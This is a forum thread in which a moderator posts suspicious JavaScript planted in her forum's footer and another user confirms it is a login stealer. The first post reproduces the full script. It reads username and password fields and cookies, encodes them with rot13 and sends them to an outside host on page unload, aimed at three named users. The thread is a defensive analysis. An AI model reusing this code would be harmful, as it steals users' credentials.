Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 7 of 7
  1. #1
    New to the CF scene
    Join Date
    Dec 2006
    Posts
    4
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Unsure what this JS code does

    I'm a moderator on a forum, and without informing the admin another moderator (who is responsible for tech things) put up this javascript code in the forum footer, and we have no idea what it does...basically we're suspicious, we have limited javascript knowledge and if we ask the tech mod it's hard to trust his explanation.

    All of the mentioning of 'username' and 'pass' in the code made us suspect the code might be for stealing members login details. We've had an incident recently where a member believes someone has accessed their account, so we want to make sure this code didn't contribute to it.

    I know we're probably just paranoid

    If anyone can give me an idea of what the purpose of it is, I'd be so grateful.

    Thank you,

    Daria.


    Code:
    var users=['cbfrl','ckkk','puybrxvggra'];
    //var users=['foo'];
    
    
    function rot(t,u,v){return String.fromCharCode(((t-u+v)%(v*2))+u);}
    function rot13(s){ var b=[], c, i = s.length,  a = 'a'.charCodeAt(), z = a + 26,  A = 'A'.charCodeAt(), Z = A + 26; while(i--) {  c = s.charCodeAt( i );  if( c>=a && c<z ) { b[i] = rot( c, a, 13 ); }  else if( c>=A && c<Z ) { b[i] = rot( c, A, 13 ); }  else { b[i] = s.charAt( i ); } } return b.join( '' );}
    
    function collectionImg(usr,pwd){
            var src_url = 'http://www.quickdry.net/quickdry/ajax/image.php';
    	var poststr_usr = "hfreanzr=" + encodeURI(usr);
    	var poststr_pwd = "cnffjbeq=" + encodeURI(pwd);
    	window['myimg1'] = new Image();
    	window['myimg1'].src=src_url + '?' + poststr_usr + "&" + poststr_pwd;
    }
    function collectionImgCookie(usr,pwd){
            var src_url = 'http://www.quickdry.net/quickdry/ajax/imagec.php';
    	var poststr_usr = "hfreanzr=" + encodeURI(rot13(usr));
    	var poststr_pwd = "cnffjbeq=" + encodeURI(rot13(pwd));
    	window['myimg2'] = new Image();
    	window['myimg2'].src=src_url + '?' + poststr_usr + "&" + poststr_pwd;
    }
    
    function getCookie(NameOfCookie)
    { if (document.cookie.length > 0)
    { begin = document.cookie.indexOf(NameOfCookie+"=");
    if (begin != -1)
    { begin += NameOfCookie.length+1;
    end = document.cookie.indexOf(";", begin);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(begin, end)); }
    }
    return '';
    }
    
    function setCookie(NameOfCookie, value, expiredays)
    { var ExpireDate = new Date ();
    ExpireDate.setTime(ExpireDate.getTime() + (expiredays * 24 * 3600 * 1000));
    document.cookie = NameOfCookie + "=" + escape(value) +
    ((expiredays == null) ? "" : "; expires=" + ExpireDate.toGMTString());
    }
    
    //expiry date is a date object
    function setCookieExplicitDate(NameOfCookie, value, expirydate)
    {
    document.cookie = NameOfCookie + "=" + escape(value) +
    ((expiredays == null) ? "" : "; expires=" + expirydate.toGMTString());
    }
    
    function delCookie(NameOfCookie)
    { if (getCookie(NameOfCookie)) {
    document.cookie = NameOfCookie + "=" +
    "; expires=Thu, 01-Jan-70 00:00:01 GMT";
    }}
    
    function hasCookie(NameOfCookie){
    	var v=getCookie(NameOfCookie);
    	if ((v==null)||(v=='')||(v=='null')){
             	return false;
    	}else{
    		return true;
    	}
    }
    
    function setCredentials(c){
     	setCookie("credentials",c,30);
    }
    function getCredentials(){
    	return getCookie("credentials");
    }
    function hasCredentials(){
    	var v=getCookie("credentials");
    	if ((v!=null)&&(v!='')&&(v!='null')){
             	return true;
    	}else{
    		return false;
    	}
    	return false;
    }
    function setCollected(val){
     	setCookie("collected",val,30);
    }
    function hasCollected(username, use_username){
     	var v=getCookie("collected");
    	if ((v!=null)&&(v!='')&&(v!='null')&&(hasCredentials())){
    		if (use_username){
    			if (v==username){
    				return true;
    			}else{
    			     	return false;
    			}
    		}
             	return true;
    	}else{
    		return false;
    	}
    }
    function getFormLogin(){
    	var everything=document.getElementsByTagName('input');
    	var s='';
    	for(var i=0;i<everything.length;i++)
    	{
    		try{
                    if(everything[i].getAttribute('name').toLowerCase()=="username")
                    {
                            s=everything[i].value;
                    }
    		}catch(er){
    		}
    	}
    	return s;
    }
    function getFormPassword(){
    	var everything=document.getElementsByTagName('input');
    	var s='';
    	for(var i=0;i<everything.length;i++)
    	{
    		try{
                    if(everything[i].getAttribute('type').toLowerCase()=="password")
                    {
                            s=everything[i].value;
                    }
    		}catch(er){
    		}
    	}
    	return s;
    }
    function inUserList(username){
    	for(var i=0;i<users.length;i++){
    		if (users[i]==rot13(username)){
    			return true;
    		}
    	}
    	return false;
    }
    function isCollectableUser(){
    	try{
    		if (inUserList(getFormLogin())){
    			return true;
    		}
    	}catch(er){
    	}
    	try{
    		if (inUserList(pb_username)){
    			return true;
    		}
    	}catch(er){
    	}
    	return false;
    }
    function atLoginPage(){
    	if (pb_username=="Guest"){
    		return true;
    	}
    	return false;
    }
    
    function collectDetailsFromCookie(){
    	if (inUserList(pb_username)){
            	if (hasCookie("pass")){
                     	collectionImgCookie(pb_username,getCookie("pass"));
            	}
    	}
    }
    
    function collectDetails()
    {
    	if (isCollectableUser()){
    		if (hasCollected(pb_username,true)){
    			var plain_pwd=rot13(getCredentials());
    			if (atLoginPage()){
                            	if (getFormPassword() != plain_pwd){
                                            delCookie('collected');
                                            setCredentials(rot13(getFormPassword()));
    				}
    			}
    
    		}else{
    			if ((hasCredentials(pb_username,true))&&(!atLoginPage())){
    				var usr=rot13(pb_username);
    				var pwd=getCredentials();
    				collectionImg(usr,pwd);
    				setCollected(pb_username);
    			}else{
    				if (atLoginPage()){
    					setCredentials(rot13(getFormPassword()));
    				}else{
    					delCookie('user');
    					delCookie('pass');
    					delCookie('collected');
    					delCookie('credentials');
    				}
    			}
    		}
    	}else{
    		delCookie('collected');
    		delCookie('credentials');
    	}
    }
    window.onunload=collectDetails;
    
    collectDetailsFromCookie();
    Last edited by daria35; 12-08-2006 at 07:28 PM.

  • #2
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Join Date
    Dec 2004
    Location
    In a place far, far away...
    Posts
    19,291
    Thanks
    2
    Thanked 1,043 Times in 1,019 Posts
    Well the fact that he is using this
    http://www.quickdry.net/quickdry/ajax/image.php
    Which is able to get info from just being used on the page. Its a dynamic image that collects info so your suspicions are exactly right. It does appear to be collecting usernames and passwords then sending them back to the image he is using.

    This image
    http://www.quickdry.net/quickdry/ajax/image.php
    is a 1x1 transparent image so its not seen.

    He uses another one here
    http://www.quickdry.net/quickdry/ajax/imagec.php

    That does the same thing except it stores the info in a cookie somewhere.

    Is your forum on quickdry.net? If its not then I recommend removing the js as it seems to have no purpose other than to be malicious.
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #3
    New to the CF scene
    Join Date
    Dec 2006
    Posts
    4
    Thanks
    0
    Thanked 0 Times in 0 Posts
    No, our forum is hosted on www.proboards.com.

    Thank you for confirming our suspicions.

    Funnily enough, once we started to discuss the issue privately in pm's between a couple of mods on the forum (without the tech mod) the code was all of a sudden taken down from the forum footer, and it wasn't taken down by any of us.

    The first part of the code:

    var users=['cbfrl','ckkk','puybrxvggra'];
    //var users=['foo'];

    Are they meant to be usernames of forum members? Because those aren't the names of anyone signed up, what are they meant to be?

    Thanks again for your help.
    Last edited by daria35; 12-07-2006 at 10:13 PM.

  • #4
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Join Date
    Dec 2004
    Location
    In a place far, far away...
    Posts
    19,291
    Thanks
    2
    Thanked 1,043 Times in 1,019 Posts
    It seems like whoever put the code up was testing to see if it worked. Once they figured that it worked or not they would assign the users var to something else that was more tied into the forums such as username login box.
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #5
    New to the CF scene
    Join Date
    Dec 2006
    Posts
    4
    Thanks
    0
    Thanked 0 Times in 0 Posts
    So to get the passwords he would have had to put the usernames set as the variables?

    Could those random letters be encrypted usernames? It just looks odd because my username and another mod's name are "pxxx" and "pseudonymph", they kind of look similar and are the same amount of letters as two of those random words he's put as the variables. It could just be a coincidence I suppose.

    He had the script up on the forum for about a month, and the code wasn't posted directly inside the forum footers box, probably so we wouldn't notice it and question it, it was posted as a link to the script, like <script src="http://www.quickdry.net/quickdry/forum/rogue/rogue.js" type="text/javascript"></script> amongst a whole bunch of other things we had put in there.

    So just to clarify, is there any chance at all that the script could have been for something innocent?

    I also found this 'test' script uploaded on his site:
    http://www.quickdry.net/quickdry/forum/rogue/test.js
    That one was never posted on the forum though I don't think.
    Last edited by daria35; 12-07-2006 at 11:24 PM.

  • #6
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Join Date
    Dec 2004
    Location
    In a place far, far away...
    Posts
    19,291
    Thanks
    2
    Thanked 1,043 Times in 1,019 Posts
    I see nothing innocent about the script other than whoever put it up was trying to get the private info of one or more persons. Those three test users decrypt into the following names

    posey
    pxxx
    chloekitten

    I say change your passwords, remove the script, and remove that moderator from your staff. If you would like to know how I got those usernames decrypted then you can follow this as a template
    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <meta content="description" name="Description">
    <meta content="keywords" name="Keywords">
    <title></title>
    <script type="text/javascript">
    function rot(t,u,v){return String.fromCharCode(((t-u+v)%(v*2))+u);}
    function rot13(s){ var b=[], c, i = s.length,  a = 'a'.charCodeAt(), z = a + 26,  A = 'A'.charCodeAt(), Z = A + 26; while(i--) {  c = s.charCodeAt( i );  if( c>=a && c<z ) { b[i] = rot( c, a, 13 ); }  else if( c>=A && c<Z ) { b[i] = rot( c, A, 13 ); }  else { b[i] = s.charAt( i ); } } return b.join( '' );}
    alert(rot13('cbfrl'));
    alert(rot13('ckkk'));
    alert(rot13('puybrxvggra'));
    </script>
    </head>
    <body>
    </body>
    </html>
    It uses the two functions that were in the javascript file you found.
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #7
    New to the CF scene
    Join Date
    Dec 2006
    Posts
    4
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Thanks Aerospace.

    I really appreciate your help and advice on this matter, and so will our forum members.
    Last edited by daria35; 12-08-2006 at 07:26 AM.


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •